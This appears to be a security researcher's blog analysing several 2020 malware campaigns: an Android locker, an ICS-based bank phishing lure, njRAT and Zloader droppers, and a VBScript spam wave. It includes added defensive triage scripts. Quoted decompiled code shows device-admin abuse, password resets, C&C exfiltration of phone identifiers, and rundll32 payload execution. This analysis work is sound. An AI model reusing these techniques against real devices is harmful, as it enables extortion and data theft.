Sunday, 17 May 2020

Android Locker targeting Russian Users

On 15th of May 2020, a malicious Android application was found hosted at the URL: hxxp://

This application has the capability to add a device administrator and use it to reset the password of the Android phone. Once the phone is locked, the application will demand a ransom from the user to unlock the phone.

In this blog, I will describe the functionality of this Android locker.

MD5 hash of the APK file: a67480f99005d99cdff2dc1e2002536c
Filename: install.apk
URL: hxxp://
Package name:

From the AndroidManifest.xml we can see that 4 receivers are present in this application:

Listen - handles the DEVICE_ADMIN_ENABLED intent
TryDisable - handles the trydisable intent
Work - handles the spwd intent
Boot - handles the BOOT_COMPLETED intent
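The receiver combination above (a DEVICE_ADMIN_ENABLED handler plus a BOOT_COMPLETED handler, chained through app-private actions) is what gives this locker its persistence, and it is visible from the manifest alone. The script below is an added triage example written for this post, not code from the sample or from any tool it mentions. It runs over a constructed manifest modelled on the four receivers named here; the package name is a placeholder, and the BIND_DEVICE_ADMIN permission on the Listen receiver is the standard declaration a device-admin receiver carries, assumed here rather than taken from the sample.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = f"{{{ANDROID_NS}}}name"
PERMISSION = f"{{{ANDROID_NS}}}permission"

DEVICE_ADMIN_ENABLED = "android.app.action.DEVICE_ADMIN_ENABLED"
BOOT_COMPLETED = "android.intent.action.BOOT_COMPLETED"
BIND_DEVICE_ADMIN = "android.permission.BIND_DEVICE_ADMIN"

# Constructed manifest modelled on the four receivers described in the post.
# The package name is a placeholder; the real sample's package name is not reproduced here.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="placeholder.package.name">
  <application android:label="install">
    <activity android:name=".MainActivity" />
    <activity android:name=".WebActivity" />
    <receiver android:name=".Listen"
              android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
      </intent-filter>
    </receiver>
    <receiver android:name=".TryDisable">
      <intent-filter><action android:name="trydisable" /></intent-filter>
    </receiver>
    <receiver android:name=".Work">
      <intent-filter><action android:name="spwd" /></intent-filter>
    </receiver>
    <receiver android:name=".Boot">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED" /></intent-filter>
    </receiver>
  </application>
</manifest>
"""


def receiver_actions(manifest_xml):
    """Map each <receiver> name to the set of intent actions its filters declare."""
    root = ET.fromstring(manifest_xml)
    return {
        rcv.get(NAME): {a.get(NAME) for a in rcv.iter("action")}
        for rcv in root.iter("receiver")
    }


def triage_manifest(manifest_xml):
    """Flag the receiver combination a device-admin locker needs.

    'locker_pattern' is True when one receiver handles DEVICE_ADMIN_ENABLED
    and another handles BOOT_COMPLETED (admin abuse plus reboot persistence)."""
    root = ET.fromstring(manifest_xml)
    actions = receiver_actions(manifest_xml)
    admin = sorted(n for n, acts in actions.items() if DEVICE_ADMIN_ENABLED in acts)
    boot = sorted(n for n, acts in actions.items() if BOOT_COMPLETED in acts)
    # Actions without a package-style prefix ("spwd", "trydisable") are app-private
    # control messages; the locker uses them to chain admin-enabled -> password reset.
    custom = sorted(n for n, acts in actions.items()
                    if any(a and "." not in a for a in acts))
    bind_admin = sorted(r.get(NAME) for r in root.iter("receiver")
                        if r.get(PERMISSION) == BIND_DEVICE_ADMIN)
    return {
        "device_admin_receivers": admin,
        "boot_receivers": boot,
        "custom_action_receivers": custom,
        "bind_device_admin_receivers": bind_admin,
        "locker_pattern": bool(admin) and bool(boot),
    }


if __name__ == "__main__":
    for key, value in triage_manifest(SAMPLE_MANIFEST).items():
        print(f"{key}: {value}")
```

The manifest inside a real APK is stored as binary XML, so it has to be decoded first (apktool or androguard both do this) before it can be fed to a parser like the one above.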

The MainActivity class is shown below.

In the MainActivity, it fetches the IMEI and IMSI values from the phone using the "phone" system service as shown below.

    // The "phone" system service (TelephonyManager) exposes the device identifiers
    Object localObject = (TelephonyManager)getSystemService("phone");
    paramBundle = ((TelephonyManager)localObject).getSubscriberId(); // IMSI
    String str = ((TelephonyManager)localObject).getDeviceId();      // IMEI

This data is sent to the C&C server in an HTTP GET request as shown below.

    new Request().execute(new String[] { "" + str + "&imsi=" + paramBundle + "&action=1" });

GET /chceimw.php?imei=000000000000000&imsi=XXXXX0000000000&action=1 HTTP/1.1
Connection: close
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Adding a new device administrator

The code section below will add a new device administrator:

    localObject = new ComponentName(this, Listen.class);
    Intent localIntent = new Intent("");
    localIntent.putExtra("", (Parcelable)localObject);
    localIntent.putExtra("", getString(2131034113));

Below is the message displayed on the phone when the user is asked to install a new Device Administrator.

The policy for the new device admin is set to the Listen class.

Once the device admin is added, the onEnabled() method in the Device admin class will be called as shown below.

The onEnabled() method will broadcast an intent with the name: "spwd" which will be handled by the Work Class (this receiver is defined in the AndroidManifest.xml file).

    // Broadcast the app-private "spwd" action, picked up by the Work receiver
    paramContext.sendBroadcast(new Intent("spwd"));

Resetting Password and Locking the Phone

Let's look at the Work class which handles the intent with the name: "spwd".

It performs the following operations.

1. Fetches the IMSI and IMEI values using the getSubscriberId() and getDeviceId() methods of the phone system service.

2. Generates a new random password as shown below:

    // Six-digit numeric password in the range 111112 to 999979
    String str = String.valueOf(new Random().nextInt(888868) + 111112);

3. Uses the "device_policy" system service (DevicePolicyManager) to reset the password and lock the phone as shown below.

    // Flag 1 is RESET_PASSWORD_REQUIRE_ENTRY: the new password must be entered at the next unlock
    localDevicePolicyManager.resetPassword(str, 1);

4. Sends an HTTP GET request with the IMSI, IMEI and randomly generated password as shown below:

    new Request().execute(new String[] { "" + (String)localObject + "&imsi=" + paramIntent + "&data=" + str });

5. Once the password is successfully set, the onPasswordSucceeded() method in the Listen class will be called as shown below.

    paramIntent = new Intent(paramContext, WebActivity.class);

This method will start the activity called WebActivity.

The onCreate() method in the Web Activity will create a webView and load the ransom message from the URL: hxxp:// as shown below.

  public void onCreate(Bundle paramBundle)
  {
    // Resource id 2131099648 is the WebView that displays the ransom page
    this.webView = ((WebView)findViewById(2131099648));
  }

The ransom message displayed on the Android phone is shown below.

The phone will immediately be locked by the ransomware. Once the user tries to unlock the phone with the old PIN, the above ransom message is displayed.

This message is asking the user to send 1000 roubles to the payment address: 4693 9575 8653 7180


Wednesday, 15 April 2020

Outlook Calendar File (ICS file format) used for Wells Fargo Phishing

Attackers are always trying to find ways to evade security detection mechanisms. Even for credential phishing attacks, attackers find ways to evade the URL detection mechanisms used in security products.

One such method is embedding URLs in different file formats such as PDF, MS Office files such as doc, xls and so on.

Today I found an instance of a phishing attack where the attackers embedded a malicious phishing URL inside an ICS file. ICS is the calendar file format used by Outlook, and each file corresponds to an entry (appointment) on the calendar.

MD5 hash of the ICS file: 0986e7cbdef080dada8dee9c55542c37

At the time of writing there are 0 detections on VT for this file.

Figure 1: 0 detections on VT.

The malicious URL is present inside the calendar appointment.

Below are the different stages in this attack.

Stage 1: Calendar invitation opened and displayed in MS Office Outlook.

Figure 2: ICS file opened in MS Office Outlook.

Stage 2: The URL is present inside the Calendar appointment.

Figure 3: Phishing URL present inside calendar appointment.

Sharepoint Phishing URL: hxxps://

Stage 3: Sharepoint site is used to host the phishing content as shown below.

Figure 4: Sharepoint page hosting the content and phishing link.

The contents of this page pretend to be from the Fraud Prevention Team of Wells Fargo and require the user to click on a link to take further action.

Stage 4: When the user clicks on the link in the above page, it redirects to the URL: hxxps://

Contents of the page are shown below.

Figure 5: Wells Fargo phishing page.

This page requests several pieces of sensitive information from the user such as username, password, email address, 4-digit card PIN and account number details.

Conclusion: Users should pay extra attention while opening Calendar invitations and security products should take essential measures to scan ICS files. As can be seen, there are 0 detections on VT for this file format even though it contains a live phishing URL.
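The point about scanning ICS files has one detail worth showing: iCalendar content lines are folded at 75 octets (RFC 5545), so a URL inside a DESCRIPTION can be split across two physical lines and a naive line-by-line regex only sees a truncated prefix. The script below is an added example written for this post, not code from any product mentioned here. It unfolds and unescapes a constructed invitation (the URLs are placeholders; the real SharePoint link is not reproduced) and compares a proper extraction with the naive scan.

```python
import re
from urllib.parse import urlsplit

# Constructed ICS invitation; the URLs are placeholders standing in for the
# SharePoint link the real file carried (that URL is not reproduced here).
SAMPLE_ICS = (
    "BEGIN:VCALENDAR\r\n"
    "VERSION:2.0\r\n"
    "PRODID:-//constructed sample//EN\r\n"
    "BEGIN:VEVENT\r\n"
    "UID:constructed-0001@invite.example\r\n"
    "DTSTART:20200415T140000Z\r\n"
    "SUMMARY:Fraud Prevention Team - action required\r\n"
    # RFC 5545 folds long lines; the URL continues on the next physical line.
    "DESCRIPTION:Review the notice at https://placeholder-sharepoint.example/si\r\n"
    " tes/fraud/Shared%20Documents/notice.aspx before 5pm\\, then confirm.\r\n"
    "LOCATION:Online\r\n"
    "URL:https://placeholder-login.example/verify\r\n"
    "END:VEVENT\r\n"
    "END:VCALENDAR\r\n"
)

URL_RE = re.compile(r"https?://[^\s<>\"']+")
_ESCAPES = {"\\": "\\", ";": ";", ",": ",", "n": "\n", "N": "\n"}


def unfold(text):
    """Join folded lines: a line starting with SPACE or TAB continues the previous one."""
    lines = []
    for raw in text.replace("\r\n", "\n").split("\n"):
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def unescape(value):
    """Undo iCalendar TEXT escaping (\\\\ \\; \\, \\n) in a single left-to-right pass."""
    return re.sub(r"\\([\\;,nN])", lambda m: _ESCAPES[m.group(1)], value)


def split_line(line):
    """Split a content line at the first ':' outside double quotes (parameters may quote colons)."""
    quoted = False
    for i, ch in enumerate(line):
        if ch == '"':
            quoted = not quoted
        elif ch == ":" and not quoted:
            return line[:i], line[i + 1:]
    return None, None


def properties(text):
    """Yield (NAME, value) for every content line, with parameters stripped and text unescaped."""
    for line in unfold(text):
        head, value = split_line(line)
        if head is not None:
            yield head.split(";")[0].upper(), unescape(value)


def find_ics_urls(text):
    """Return every URL in the calendar together with the property it was found in."""
    found = []
    for name, value in properties(text):
        for url in URL_RE.findall(value):
            url = url.rstrip(".,;)")
            found.append({"property": name, "url": url, "host": urlsplit(url).hostname})
    return found


def naive_urls(text):
    """Regex over raw physical lines, no unfolding: a URL split across a fold comes back truncated."""
    return [m.rstrip(".,;)") for line in text.split("\r\n") for m in URL_RE.findall(line)]


if __name__ == "__main__":
    for hit in find_ics_urls(SAMPLE_ICS):
        print(f"{hit['property']}: {hit['url']}  (host {hit['host']})")
    print("naive scan:", naive_urls(SAMPLE_ICS))
```

The hosts returned by find_ics_urls are the values to feed into URL reputation or an allowlist check; the naive scan would have passed a truncated host that no reputation service could match.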


Saturday, 11 April 2020

VBScript using Coronavirus theme to execute njRAT

Recently we have observed many samples in-the-wild using the coronavirus theme to spread different types of trojans and Remote Administration Tools (RATs).

I came across one such interesting sample today. It is a VBScript which drops and executes an njRAT binary embedded in it.

SHA256 hash: 1e18414968c0317cc5fefc5f25de845eba5566fcb236b9e4bdd84f0a82902c30
Filename: Covid19.vbs

The encoded VBScript is as shown below.

This script has funny variable names which make the code interesting to read as well :)

For example, the below code section:

        If (Covid = 0) Then
            Do Until ebula = Len(winter)
                ebula = ebula + 1
                ' Shift each character of the encoded string by Len(corrona) - spring
                coldflue = coldflue & ChrW(AscW(Mid(winter, ebula, 1)) - spring + Len(corrona))
            Loop
        End If
        If (Covid = 0) Then
        End If

The coldflue variable contains the decoded VBScript which is shown below.
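The decoding loop is a fixed character shift of Len(corrona) - spring, which is why a Python port of it is a two-line job. The block below is an added example written for this post, not the script's own code and not taken from any tool. It ports the loop, and adds a key-recovery helper for the case where the shift constants have been renamed or split across the script: every shift in a range is tried and scored by printable output plus VBScript keyword hits. The sample is constructed: a harmless two-line script encoded with spring=13 and corrona="corrona" (net decode shift of -6).

```python
import string

# Keywords that a decoded VBScript is likely to contain; used only for scoring.
VBS_KEYWORDS = ("CreateObject", "WScript", "Set ", "Function", "Execute", "End ")


def vbs_decode(winter, spring, corrona):
    """Port of the script's loop: ChrW(AscW(c) - spring + Len(corrona)) for each character."""
    shift = len(corrona) - spring
    return "".join(chr(ord(c) + shift) for c in winter)


def vbs_encode(plain, spring, corrona):
    """Inverse transform, used here only to build the constructed sample."""
    shift = spring - len(corrona)
    return "".join(chr(ord(c) + shift) for c in plain)


def guess_key(encoded, max_shift=255):
    """Recover the net decode shift without knowing spring/corrona.

    Returns (shift, decoded_text) for the best-scoring shift."""
    best = None
    for shift in range(-max_shift, max_shift + 1):
        codes = [ord(c) + shift for c in encoded]
        if min(codes) < 0 or max(codes) > 0x10FFFF:
            continue
        text = "".join(map(chr, codes))
        printable = sum(ch in string.printable for ch in text)
        hits = sum(text.count(k) for k in VBS_KEYWORDS)
        score = printable + 50 * hits
        if best is None or score > best[0]:
            best = (score, shift, text)
    return best[1], best[2]


# Constructed sample: harmless script, encoded with the constants below.
SAMPLE_SPRING = 13
SAMPLE_CORRONA = "corrona"
SAMPLE_PLAIN = ('Set fso = CreateObject("Scripting.FileSystemObject")\r\n'
                'WScript.Echo fso.GetTempName()')
SAMPLE_ENCODED = vbs_encode(SAMPLE_PLAIN, SAMPLE_SPRING, SAMPLE_CORRONA)


if __name__ == "__main__":
    print("encoded :", repr(SAMPLE_ENCODED))
    print("decoded :", repr(vbs_decode(SAMPLE_ENCODED, SAMPLE_SPRING, SAMPLE_CORRONA)))
    shift, text = guess_key(SAMPLE_ENCODED)
    print("guessed shift", shift, "->", repr(text))
```

On a real sample the encoded string is the large literal assigned to winter; paste it into guess_key and the recovered text is what the script goes on to execute.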

The Base64 encoded blob in this VBScript decodes to an njRAT binary which is then dropped to the system to the path: C:\Users\sasithar79\AppData\Roaming\Microsoft\Invisible Server Process\\covid19.exe and executed as shown below.

SHA256 hash of the decoded njRAT binary: 59ebc1d6ef4c1dcd1e69abf55e7ea166b29a3dd208f286699345583b992ff068

Indicators of Compromise

Network IOC

Connects to: and port 15152


Thursday, 9 April 2020

XLM Hidden Macrosheets used for Evasion

Recently we have observed an increase in the usage of XLM based macro files which use Excel 4.0 macros and hidden macrosheets by attackers. I think threat actors will start leveraging this format even more in the near future. The advantage of using this format for attacks is that they don't use standard VBA macros. Most of the open source OLE VBA tools don't have the capability to extract the macros from them.

On April 9th 2020, I started observing a lot of XLS samples in the wild which used XLM Excel 4.0 hidden macrosheets for performing malicious activities.

This blog is a quick writeup to capture more information about this ongoing campaign.

All the files followed the naming convention: <Person's Name Resume>.xls


Filename: James Johnson Resume.xls
MD5 hash: 18ddf82706bcc79d12d0033df6991271

Filename: William Smith Resume.xls
MD5 hash: 971dcb961e8a894ed395a007965c7408

Filename: Maria Hernandez Resume.xls
MD5 hash: f5cf86e2acd65772a078c73fbbb70429

Interestingly all these samples have a detection of 0 on VT at the time of writing this blog as shown below.

Now, let us look at the macro code.

For the purpose of analysis, we will check the XLS file with MD5 hash: f5cf86e2acd65772a078c73fbbb70429

The contents of the file look like shown below.

It uses social engineering to ask the user to enable macros so that the content of the file can be viewed. Unlike regular macro based XLS files used in spam campaigns, this one does not have a VBA macro which can be extracted easily.

It uses hidden macrosheets which have to be unhidden manually as shown below.

The macro code itself can be accessed by opening these hidden macrosheets. This is an Excel 4.0 macro and the code can be seen in different cells of the worksheet as shown below.
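Because VBA-oriented tools miss these files, the useful detection signal is structural: the workbook-globals substream of a BIFF8 .xls lists every sheet in BoundSheet8 records, each carrying a hidden-state field and a sheet-type byte, and an Excel 4.0 macro sheet that is hidden or "very hidden" shows up there directly. The parser below is an added example written for this post (not code from the samples or from any tool named here). It walks a constructed workbook-globals substream containing a visible worksheet and a very-hidden macro sheet; the scan_xls wrapper for real files assumes the third-party olefile package and is not exercised by the sample.

```python
import struct

BOF = 0x0809
EOF_RECORD = 0x000A
BOUNDSHEET = 0x0085

# BoundSheet8 sheet-type byte and hidden-state field ([MS-XLS] 2.4.28)
SHEET_TYPE = {0x00: "worksheet", 0x01: "macrosheet", 0x02: "chart", 0x06: "vba module"}
SHEET_STATE = {0: "visible", 1: "hidden", 2: "very hidden"}


def iter_records(stream):
    """Walk BIFF records (2-byte type, 2-byte length, payload) up to the first EOF.

    BoundSheet8 records live in the workbook-globals substream, which ends at that EOF,
    so the sheet substreams that follow never need to be parsed."""
    off = 0
    while off + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, off)
        yield rtype, stream[off + 4: off + 4 + rlen]
        off += 4 + rlen
        if rtype == EOF_RECORD:
            break


def parse_boundsheet(payload):
    """lbPlyPos (4), hsState in the low 2 bits of the next byte, dt (1), then a
    ShortXLUnicodeString name: cch (1), fHighByte flag (1), characters."""
    lb_ply_pos, hs_byte, dt, cch, flags = struct.unpack_from("<IBBBB", payload, 0)
    if flags & 0x01:
        name = payload[8:8 + 2 * cch].decode("utf-16-le", "replace")
    else:
        name = payload[8:8 + cch].decode("latin-1")
    return {"name": name, "offset": lb_ply_pos,
            "state": SHEET_STATE.get(hs_byte & 0x03, "unknown"),
            "type": SHEET_TYPE.get(dt, f"unknown(0x{dt:02x})")}


def list_sheets(stream):
    return [parse_boundsheet(p) for t, p in iter_records(stream) if t == BOUNDSHEET]


def find_hidden_macrosheets(stream):
    """Excel 4.0 macro sheets that are hidden or very hidden."""
    return [s for s in list_sheets(stream)
            if s["type"] == "macrosheet" and s["state"] != "visible"]


def scan_xls(path):
    """Wrapper for a real .xls: extracts the Workbook stream with olefile (pip install olefile)."""
    import olefile  # third-party; assumption: available in the analysis environment
    ole = olefile.OleFileIO(path)
    try:
        stream_name = "Workbook" if ole.exists("Workbook") else "Book"
        return find_hidden_macrosheets(ole.openstream(stream_name).read())
    finally:
        ole.close()


# --- constructed workbook-globals substream used as the sample input ---
def _record(rtype, payload):
    return struct.pack("<HH", rtype, len(payload)) + payload


def _boundsheet(name, state, sheet_type, offset):
    raw = name.encode("latin-1")
    return _record(BOUNDSHEET, struct.pack("<IBBBB", offset, state, sheet_type, len(raw), 0) + raw)


SAMPLE_STREAM = (
    _record(BOF, struct.pack("<HHHHII", 0x0600, 0x0005, 0x0DBB, 0x07CC, 0, 0))
    + _boundsheet("Sheet1", 0, 0x00, 0x200)   # visible worksheet (the lure)
    + _boundsheet("Macro1", 2, 0x01, 0x400)   # very hidden Excel 4.0 macro sheet
    + _record(EOF_RECORD, b"")
)


if __name__ == "__main__":
    for sheet in list_sheets(SAMPLE_STREAM):
        print(sheet)
    print("hidden macro sheets:", [s["name"] for s in find_hidden_macrosheets(SAMPLE_STREAM)])
```

A hidden macro sheet on its own is the trigger for a closer look; pairing it with an Auto_Open defined name in the same globals substream is what makes the file run on open, so a fuller check would also parse the defined-name records.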

The macro upon execution will connect to the C2 server to download a DLL which will be loaded dynamically using rundll32 to continue the malicious activities.

The network connection and response are shown below:

From whois lookup, it can be seen that the callback domain: was registered on March 26th 2020.

I'll add more details of the campaign as they are discovered in this blog.

Indicators of Compromise

URLs hosting the Zloader DLL:


MD5 hashes of the XLM files:



Friday, 7 February 2020

Spam campaign targeting Australian Users [Feb 7th 2020]

On Feb 7th 2020, I saw a couple of emails targeted towards Australian users. The malware delivery method consisted of ZIP files containing malicious VBScript files sent as email attachments.

Below is a quick analysis of this attack chain:

An example of Malicious email:

Attachment Analysis:

ZIP MD5 hash: 03383063f3fbdb51d142d7f022d52858
MD5 hash: 6d12aa34c3aa515ea909aaf5b6567316
Filename: GXIBV5537344461902.vbs

The ZIP file contained a malicious VBScript with an unusually large size of 1.7MB. Usually in spam campaigns we see VBScripts of a smaller size.

The script also contains an interesting obfuscation method as shown below:

Once the VBScript is executed, it displays a Pop Up message for social engineering purposes as shown below:

Rest of the execution sequence is:

1. Delays the execution (look for High CPU Usage).

2. Drops a DLL with TXT extension in the %temp% directory path with the name: Wv.txt

Note: A filetype and file extension mismatch for a dropped file is a good indicator for malicious file detection.

3. Executes the dropped DLL file using rundll32 as shown below:

rundll32.exe C:\Users\<username>\AppData\Local\Temp\<name>.txt,DllRegisterServer

4. Creates several directories with random names in the path: %appdata%\Roaming\

5. Copies the dropped DLL file to the path: %appdata%\Roaming\<random_folder_name> with a random name.

6. Injects malicious code in msiexec.exe process and further malicious activities are performed in the context of msiexec.exe
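Two of the steps above are cheap to turn into detections: the type/extension mismatch from step 2 (a PE image stored as .txt) and the rundll32 command line from step 3 (a non-DLL extension under a user-writable profile path, invoked through DllRegisterServer). The block below is an added example written for this post, not code from any product. It checks both conditions against constructed input: a minimal byte string with a valid MZ/PE header layout (not a real executable) and the command line quoted above with its username placeholder kept.

```python
import re
from pathlib import PureWindowsPath

# Extensions rundll32 legitimately loads; anything else is a mismatch worth flagging.
DLL_EXTENSIONS = {".dll", ".cpl", ".ocx", ".ax", ".drv"}
# Extensions under which a PE image is expected at all.
PE_EXTENSIONS = DLL_EXTENSIONS | {".exe", ".sys", ".scr", ".mui"}
USER_WRITABLE_MARKERS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\appdata\\local\\")

RUNDLL_RE = re.compile(r'^\s*"?(?:.*\\)?rundll32(?:\.exe)?"?\s+(.*)$', re.IGNORECASE)


def looks_like_pe(data):
    """MZ header plus an e_lfanew that points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def extension_mismatch(filename, data):
    """True when the content is a PE image but the name does not carry a PE extension."""
    ext = PureWindowsPath(filename).suffix.lower()
    return looks_like_pe(data) and ext not in PE_EXTENSIONS


def parse_rundll32(cmdline):
    """Split 'rundll32.exe <module>,<entry> [args]' into module and entry; None if not rundll32."""
    m = RUNDLL_RE.match(cmdline)
    if not m:
        return None
    rest = m.group(1).strip()
    if not rest:
        return None
    if rest.startswith('"'):
        end = rest.find('"', 1)
        module, tail = rest[1:end], rest[end + 1:]
    else:
        split = re.match(r"([^,\s]+)(.*)", rest)   # module ends at the first comma or space
        module, tail = split.group(1), split.group(2)
    tail = tail.lstrip()
    entry = tail[1:].split()[0] if tail.startswith(",") and tail[1:].split() else ""
    return {"module": module, "entry": entry}


def triage_rundll32(cmdline):
    """Score a rundll32 command line; returns None for non-rundll32 command lines."""
    parsed = parse_rundll32(cmdline)
    if parsed is None:
        return None
    ext = PureWindowsPath(parsed["module"]).suffix.lower()
    lowered = parsed["module"].lower()
    reasons = []
    if ext not in DLL_EXTENSIONS:
        reasons.append(f"module extension {ext or '(none)'} is not a DLL extension")
    if any(marker in lowered for marker in USER_WRITABLE_MARKERS):
        reasons.append("module lives in a user-writable profile directory")
    if parsed["entry"].lower() == "dllregisterserver" and reasons:
        reasons.append("DllRegisterServer invoked on an already suspicious module")
    return {**parsed, "extension": ext, "suspicious": bool(reasons), "reasons": reasons}


# Constructed inputs: a header-only byte string laid out like a PE (not an executable),
# and the command line from the post with the username placeholder kept.
SAMPLE_PE = b"MZ" + b"\x00" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\x00\x00" + b"\x00" * 20
SAMPLE_CMDLINE = r"rundll32.exe C:\Users\<username>\AppData\Local\Temp\Wv.txt,DllRegisterServer"


if __name__ == "__main__":
    print("Wv.txt mismatch:", extension_mismatch("Wv.txt", SAMPLE_PE))
    print(triage_rundll32(SAMPLE_CMDLINE))
```

Both checks are deliberately narrow: the command-line rule stays quiet for the common legitimate form (a system DLL by name with no path), and the mismatch rule looks at content rather than trusting the extension, which is exactly the gap this dropper relies on.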

Network communication performed in the context of msiexec.exe process is shown below:

Network IOCs:

File IOCs:

ZIP File Attachments:


VBS files:



Dropped DLL Files:


The SSL certificates used by the callback domains are issued by: Internet Widgits Pty Ltd

SSL Certificate Serial Numbers: